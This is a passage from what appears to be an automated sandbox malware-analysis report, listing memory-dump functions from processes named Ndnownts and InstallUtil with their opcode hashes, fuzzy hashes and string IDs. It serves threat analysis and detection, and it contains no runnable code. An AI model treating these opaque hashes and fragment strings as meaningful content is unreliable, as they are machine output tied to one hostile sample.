                                                                      • Instruction ID: 001a4d07d91c5406c01b9be4be7e2e93ebb8ad0fb6a20c2608c35fe5c5d4a7bc
                                                                      • Opcode Fuzzy Hash: 92d478ec1d12cc080f907ca6ab68b97a5c16628d258eb302fc2f23e26612d267
                                                                      • Instruction Fuzzy Hash: 6CE0E5719002589FDB51CFA4C850BDEBBFDFB0C300F1080A6E649E7244CA355A45CF60
                                                                      Function 05561C28 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8f6b2ec888f334e4a4f542b7e16c5dfd3c2ea9d1b259980b38acfd6ef3f6c9a
                                                                      • Instruction ID: 95b1a6ad5c9b19adaafb5ce93ae199e6a89a4df6e0558ad069edc406ab6ca6ed
                                                                      • Opcode Fuzzy Hash: d8f6b2ec888f334e4a4f542b7e16c5dfd3c2ea9d1b259980b38acfd6ef3f6c9a
                                                                      • Instruction Fuzzy Hash: E1E0C230909148DFC744DBA8D8112BCBFB8BB0A200F1080DDD84893341DA319E02CF81
                                                                      Function 05563768 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8f6b2ec888f334e4a4f542b7e16c5dfd3c2ea9d1b259980b38acfd6ef3f6c9a
                                                                      • Instruction ID: 07dc7707e97cd932d903025d5bc4ac1805f5e737b57894fb9936f2ac2024fce9
                                                                      • Opcode Fuzzy Hash: d8f6b2ec888f334e4a4f542b7e16c5dfd3c2ea9d1b259980b38acfd6ef3f6c9a
                                                                      • Instruction Fuzzy Hash: D7E0C274909148DFC780DBA8D9002ACBFF8BB09205F1084EDD84853341DA319F02CF81
                                                                      Function 05563A28 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 78d3f66d348f5cd494dd845494aa11e9b51df9c78742bc5a7fcbfa76ad3a0b18
                                                                      • Instruction ID: aa94e33360b006e57b3426add92bf5673f4b56fcde70f753a888f6d857a5538b
                                                                      • Opcode Fuzzy Hash: 78d3f66d348f5cd494dd845494aa11e9b51df9c78742bc5a7fcbfa76ad3a0b18
                                                                      • Instruction Fuzzy Hash: B1D0A73450D148DBC744CB94D800AA9F7BDFF46314F10D49C980983752CA329E02EF80
                                                                      Function 055649D5 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60f2dec3201ac9ab3d78971145fd7a42c4b3f2af87c7272c0b285f9376df0c96
                                                                      • Instruction ID: 00cce5449d77371043744e7e33f6a85a1ce75d895ff0147e33ed5f1731e418c8
                                                                      • Opcode Fuzzy Hash: 60f2dec3201ac9ab3d78971145fd7a42c4b3f2af87c7272c0b285f9376df0c96
                                                                      • Instruction Fuzzy Hash: D6E01730900108DBCF05DFC4C850EAE7B77FF49300F108014E60AAB268CB355909DF51
                                                                      Function 06C9E920 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6bb6ad6c4d49c1cfec4edab3536dda7c436f6707930068a704dc955786931f66
                                                                      • Instruction ID: a546fa42eeb4bfe7beb6e3acf47f2f171c05061a6186f1ab7211aeafbd73d59c
                                                                      • Opcode Fuzzy Hash: 6bb6ad6c4d49c1cfec4edab3536dda7c436f6707930068a704dc955786931f66
                                                                      • Instruction Fuzzy Hash: 99C08C2008F2048BCBD45296680C3F476AC9B1E205F45B404A10D00C254A640140CAA1
                                                                      Function 00B6D0F8 Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1eb64469330abbebd4b7fb6794f5396a445115cbe2cf4f3dac86192e2289f4e9
                                                                      • Instruction ID: cd78cceda7d4aa54fd30220655268318d5bb481800a19e8bf5e00d00146e87e0
                                                                      • Opcode Fuzzy Hash: 1eb64469330abbebd4b7fb6794f5396a445115cbe2cf4f3dac86192e2289f4e9
                                                                      • Instruction Fuzzy Hash: 65C08C308822088BC3887BE9BC1E3683BBCBB02702F044425E61D70821AFBC0404CEA6
                                                                      Function 06C86A8F Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bdebc5b956cf7dd06e61a6e1cf6a9b94d02a8b06e5f9e98e6e3d8dc09c3beba0
                                                                      • Instruction ID: 2067549d8221661c636e09077157dda04e04dc1213d3bb87f38cc3a65dbbbf31
                                                                      • Opcode Fuzzy Hash: bdebc5b956cf7dd06e61a6e1cf6a9b94d02a8b06e5f9e98e6e3d8dc09c3beba0
                                                                      • Instruction Fuzzy Hash: F5D0C9702440098FE7A8EB54C858B9A36AAFB99308F105094921D97696DB7449C9CBA6
                                                                      Function 00B60D24 Relevance: .0, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5a50171e5008604d7d2ef3a55f7ac67e1977dccfa2c9143f531182e8b8d68cd
                                                                      • Instruction ID: b8f4f5b0a0aac875f2d0c530cdf2d2a35dba0cf6880d77b70f7b1ddd7e6e79fd
                                                                      • Opcode Fuzzy Hash: e5a50171e5008604d7d2ef3a55f7ac67e1977dccfa2c9143f531182e8b8d68cd
                                                                      • Instruction Fuzzy Hash: ABC04C60839615D787087BA786C45BF35E0690A72C774CBE1C463512D0DF281400BE26
                                                                      Function 05563020 Relevance: .0, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 98c660f88abfa01e3ae87434a7dbcc056e366fe33e3d35dcc2cc5cf49d91157e
                                                                      • Instruction ID: a9bb46c8c8975e4f850883ff1859becd71156985bbb8655addada21b64defe32
                                                                      • Opcode Fuzzy Hash: 98c660f88abfa01e3ae87434a7dbcc056e366fe33e3d35dcc2cc5cf49d91157e
                                                                      • Instruction Fuzzy Hash:
                                                                      Function 00B60853 Relevance: .0, Instructions: 3COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6679033786dbac2d8fa4b3d57d8faa69d3d6438e4c3cf06728d37fe008bda58c
                                                                      • Instruction ID: 125c54cbb7cc525740da2d27b20313a2ef9c54bd3e2560efcb9e2cf9f4778b24
                                                                      • Opcode Fuzzy Hash: 6679033786dbac2d8fa4b3d57d8faa69d3d6438e4c3cf06728d37fe008bda58c
                                                                      • Instruction Fuzzy Hash:

                                                                      Non-executed Functions

                                                                      Function 05568881 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8>N@$<g|;$<=&
                                                                      • API String ID: 0-1849374371
                                                                      • Opcode ID: 7c47fba0f518b104069a6ee192d8834f2000f5bba15329257b0cdbf801af2414
                                                                      • Instruction ID: 660e8bcbf529fb647679daaca52afdb76acf414f747aa26e7b080b43fe1b8dcf
                                                                      • Opcode Fuzzy Hash: 7c47fba0f518b104069a6ee192d8834f2000f5bba15329257b0cdbf801af2414
                                                                      • Instruction Fuzzy Hash: 93811C70A01258CFDB94DF68D854BAE77F2FB89300F5094A9D20AEB265CB345D86CF41
                                                                      Function 055687F9 Relevance: 3.9, Strings: 3, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8>N@$<g|;$<=&
                                                                      • API String ID: 0-1849374371
                                                                      • Opcode ID: 5f75aa9615bc3f930969e59d5dd0a6a87e2d98abd4ec163882184f1eb6bf7de2
                                                                      • Instruction ID: 5d27714ea76f7b359ce71bd36f3d98d9f137b7354aeb94cf586aa51dfc8c18e8
                                                                      • Opcode Fuzzy Hash: 5f75aa9615bc3f930969e59d5dd0a6a87e2d98abd4ec163882184f1eb6bf7de2
                                                                      • Instruction Fuzzy Hash: 3A716070A002548FD758DF68D854B9EB7F6FB89300F4094A9D20AEB355CB345D89CF91
                                                                      Function 05568808 Relevance: 3.9, Strings: 3, Instructions: 181COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8>N@$<g|;$<=&
                                                                      • API String ID: 0-1849374371
                                                                      • Opcode ID: 8cf471aba8fa4d4729d83b6b7ed557e3b121a109550e2b73c9741bb094f801a7
                                                                      • Instruction ID: 8455fcf172392fcb3e91d25a2d46e42c68169560d7210908ce835f04144dde1b
                                                                      • Opcode Fuzzy Hash: 8cf471aba8fa4d4729d83b6b7ed557e3b121a109550e2b73c9741bb094f801a7
                                                                      • Instruction Fuzzy Hash: 50714F70A012548FD754DF68D854BAE77F6FB89300F4094A9D20AEB365CB345D8ACF91
                                                                      Function 0556893E Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8>N@$<g|;$<=&
                                                                      • API String ID: 0-1849374371
                                                                      • Opcode ID: f40473e39d4b8c2054fcb27a62672b23c789e877ac7b83cecc2882ea72a0aade
                                                                      • Instruction ID: 5bedcbb8be9734e0e54436a07226c4923f3036272c7a997394f9f8b5c53a01ae
                                                                      • Opcode Fuzzy Hash: f40473e39d4b8c2054fcb27a62672b23c789e877ac7b83cecc2882ea72a0aade
                                                                      • Instruction Fuzzy Hash: A2711C70A002188FD794DF68D854BAEB7F6FB89300F5090A9D24AEB365CB345D86CF81
                                                                      Function 055688AA Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8>N@$<g|;$<=&
                                                                      • API String ID: 0-1849374371
                                                                      • Opcode ID: 8004095208a94065b4e19010a307aaa6915e99250d3b8079db608be35dd7055c
                                                                      • Instruction ID: e8ab8b2b94156c8fe523d4e86035288cc4c6e1854679b06b1fbfc982a1a08246
                                                                      • Opcode Fuzzy Hash: 8004095208a94065b4e19010a307aaa6915e99250d3b8079db608be35dd7055c
                                                                      • Instruction Fuzzy Hash: 18514C70A002148FD758DF68D864BAE77F6FB89300F5090A5D24AEB3A5CB345D86CF91
                                                                      Function 055689C5 Relevance: 3.9, Strings: 3, Instructions: 140COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8>N@$<g|;$<=&
                                                                      • API String ID: 0-1849374371
                                                                      • Opcode ID: 9a541eb8ed4585d07b6618ecba8442c5b1cb9979645f30298f4ab3282e50f364
                                                                      • Instruction ID: 1080dd6f83e3a29558239961d7930ce7fa48256f8e0bf0da9833774dbf13682a
                                                                      • Opcode Fuzzy Hash: 9a541eb8ed4585d07b6618ecba8442c5b1cb9979645f30298f4ab3282e50f364
                                                                      • Instruction Fuzzy Hash: A8513E70A002148FD758DF68D855B9A77F6FB89300F5090A5D24EEB3A9CB345D86CF91
                                                                      Function 055628D9 Relevance: .3, Instructions: 274COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: daf4c5176e98b2f329cdf064700bfd726d272b2193cca23614e8d228d16cdec7
                                                                      • Instruction ID: c75409b77fdcbcbf44b9b1a02c175cfcbf90ad7506508cd05dda818ff5c02bc9
                                                                      • Opcode Fuzzy Hash: daf4c5176e98b2f329cdf064700bfd726d272b2193cca23614e8d228d16cdec7
                                                                      • Instruction Fuzzy Hash: 80C15B78E01288CFDB64CFA8D854B9DBBF2FB49304F1090A9D509BB295DBB45989CF41
                                                                      Function 055628E8 Relevance: .3, Instructions: 272COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f49b8eb445ba94b65ded58d6a68c99ffb50fffed7c097efd1253962b24e54cd6
                                                                      • Instruction ID: 6e063df3d4bf74210bc85e6c7dc13551912595c56b86daf6d2628e5ce9495630
                                                                      • Opcode Fuzzy Hash: f49b8eb445ba94b65ded58d6a68c99ffb50fffed7c097efd1253962b24e54cd6
                                                                      • Instruction Fuzzy Hash: 5AC15B78E04288CFDB64CFA8D854B9DBBF2FB49304F1090A9D509BB295DBB45989CF41
                                                                      Function 06C9E568 Relevance: .2, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8631c65b0caf13cc50af8a9e625c9f9bb503ca3b8bd1cba7014588b95edeefb
                                                                      • Instruction ID: 7452e8114e92d5f811c3a473ef54da4770648f53e2fb1470b660b96c273ab5ea
                                                                      • Opcode Fuzzy Hash: d8631c65b0caf13cc50af8a9e625c9f9bb503ca3b8bd1cba7014588b95edeefb
                                                                      • Instruction Fuzzy Hash: 0E811670E04218CFEFA4DFA9C848BADBBB5FF59304F1480A9D409AB255DB705A85CF61
                                                                      Function 00B69982 Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2c6631773cf2e8929089d9648d9c700f135ec68f184cb9ac14989cf71c40cf9
                                                                      • Instruction ID: ca2b900df6a165c77e10aaf7c9eb5d7ae6b86c0944777e655135a2ff00351483
                                                                      • Opcode Fuzzy Hash: c2c6631773cf2e8929089d9648d9c700f135ec68f184cb9ac14989cf71c40cf9
                                                                      • Instruction Fuzzy Hash: AF319671D066188BEB68CF6BC94879AFBF6AFC9304F14C0E9D54CA6264DB740A85DF01
                                                                      Function 06C80006 Relevance: .1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c91da2014103e8a679584c8e78020198b6ad682a668c88184b0318d9fc1c437c
                                                                      • Instruction ID: 971b063ed644b69f9a59486a2ca2df13186cfce2a7a4f8a4d6fe7336a9c60d42
                                                                      • Opcode Fuzzy Hash: c91da2014103e8a679584c8e78020198b6ad682a668c88184b0318d9fc1c437c
                                                                      • Instruction Fuzzy Hash: B6317071D056558FE729CF2B8C0479ABFF6AF85314F05C0EAD44C96262DB700A85CF51
                                                                      Function 06C80040 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29dd94f74e0997e694229032af3d911622c270c3a00c025c683f7b7a496b534f
                                                                      • Instruction ID: 506e929b7d8c34e2063e4ba78d95476f624a0c4103928d886eece3ec3d469aca
                                                                      • Opcode Fuzzy Hash: 29dd94f74e0997e694229032af3d911622c270c3a00c025c683f7b7a496b534f
                                                                      • Instruction Fuzzy Hash: 5D21DB71E056298BEB68CF1BCC0479AFAF7AFC8214F04C0FA941CA6215DB700A859E50

                                                                      Executed Functions

                                                                      Function 01576898 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$(o^q$,bq$,bq
                                                                      • API String ID: 0-879173519
                                                                      • Opcode ID: fe6eb2b576bf8c3966661c2e295a1ebd2f867fed6caa0755cc216d5819d49887
                                                                      • Instruction ID: 953855d97a422a250bffb4338bc492c164532662a8da674573d745490985ee22
                                                                      • Opcode Fuzzy Hash: fe6eb2b576bf8c3966661c2e295a1ebd2f867fed6caa0755cc216d5819d49887
                                                                      • Instruction Fuzzy Hash: 52D14B70E00619DFEB14CFA9E985AADBBF6FF88300F158565E509AB2A1D730E841CF50
                                                                      Function 01579868 Relevance: 3.4, Strings: 2, Instructions: 856COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$4'^q
                                                                      • API String ID: 0-273632683
                                                                      • Opcode ID: 01cc92e39185d604b2e5018b2dfb67f05537dabe0bd38b2f1cc0ed67a87e0ba0
                                                                      • Instruction ID: 488570c1634c6a8bdbb9ca3dbdfafd48009fca0218160c53c35a1544bb60ac3d
                                                                      • Opcode Fuzzy Hash: 01cc92e39185d604b2e5018b2dfb67f05537dabe0bd38b2f1cc0ed67a87e0ba0
                                                                      • Instruction Fuzzy Hash: 65728131A00219DFDB15CF68E985AAEBBF2FF88314F198555E9059F3A2D730E941CB60
                                                                      Function 01576120 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q$Hbq
                                                                      • API String ID: 0-662517225
                                                                      • Opcode ID: 2ea34f783413195ae4fabc707a4af73863574d22b0fc714da5b9598a8fbd6660
                                                                      • Instruction ID: 61a27da6a16443a09b5bb9519be8e45ef686e832fd40e3abbc8edaf7af34a1c6
                                                                      • Opcode Fuzzy Hash: 2ea34f783413195ae4fabc707a4af73863574d22b0fc714da5b9598a8fbd6660
                                                                      • Instruction Fuzzy Hash: 20128E70A006199FEB19DF69D894AAEBBF6BF88300F248569E505DB391DF30DD41CB90
                                                                      Function 0157B338 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 5bb08ea0e6bc8b730fa57261ec3f99ecc30ac4b42103306191c6c317edb3b07b
                                                                      • Instruction ID: 5213d6981b3fb630826d6f8465096cd65c4e7e6d63f6ef9d33eeafc568f9a20a
                                                                      • Opcode Fuzzy Hash: 5bb08ea0e6bc8b730fa57261ec3f99ecc30ac4b42103306191c6c317edb3b07b
                                                                      • Instruction Fuzzy Hash: 86E1E775E00218CFDB14CFA9D985A9DBBB2FF48310F158469E919AB361DB31E981CF50
                                                                      Function 0157BAC0 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 46ffcebb32b341d5c15e89f0f49c0f9a8ade95e25070bd09f92481c4a00930ad
                                                                      • Instruction ID: 2de391ea50944b6d9454165d9a9cc988e2f9d77e027519ac5d39903850b3b690
                                                                      • Opcode Fuzzy Hash: 46ffcebb32b341d5c15e89f0f49c0f9a8ade95e25070bd09f92481c4a00930ad
                                                                      • Instruction Fuzzy Hash: 3581B374E00219DFDB18DFAAD984A9DBBF2BF88300F14C469E419AB365DB309985CF51
                                                                      Function 0157CA41 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 1a67b0db37771c22b1d0aa86dec30716b9f7437bd45b157f9a118dc0192355e2
                                                                      • Instruction ID: 0056d2e6565214eb67dafde65918ec45b280125e33c0d2b8449ea56b8f316fd5
                                                                      • Opcode Fuzzy Hash: 1a67b0db37771c22b1d0aa86dec30716b9f7437bd45b157f9a118dc0192355e2
                                                                      • Instruction Fuzzy Hash: 0781B274E00219DFDB18DFAAD984A9DBBF2BF88300F14C469E819AB365DB309945CF50
                                                                      Function 0157BDA0 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: d85590654d0e851770f7a709c9451e5f586501b4ff8862d8595289d137548437
                                                                      • Instruction ID: 52b0b181199ea017750343b5a475ce25aea16ff69be6fb4819bd3154305c2387
                                                                      • Opcode Fuzzy Hash: d85590654d0e851770f7a709c9451e5f586501b4ff8862d8595289d137548437
                                                                      • Instruction Fuzzy Hash: EF81B674E00218DFDB18DFAAD984A9DBBF2FF89300F148469E819AB365DB319945CF50
                                                                      Function 015746D9 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.4149715367.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_1570000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PH^q$PH^q
                                                                      • API String ID: 0-1598597984
                                                                      • Opcode ID: 83728b7ab81b4b5f0b379d7943fe55c5f60684559c50cc532065a72960794cc3
                                                                      • Instruction ID: 294ddd970c8a988ad6292c798c0ca32688609533034cba6a9893b4ffa6068d15
                                                                      • Opcode Fuzzy Hash: 83728b7ab81b4b5f0b379d7943fe55c5f60684559c50cc532065a72960794cc3
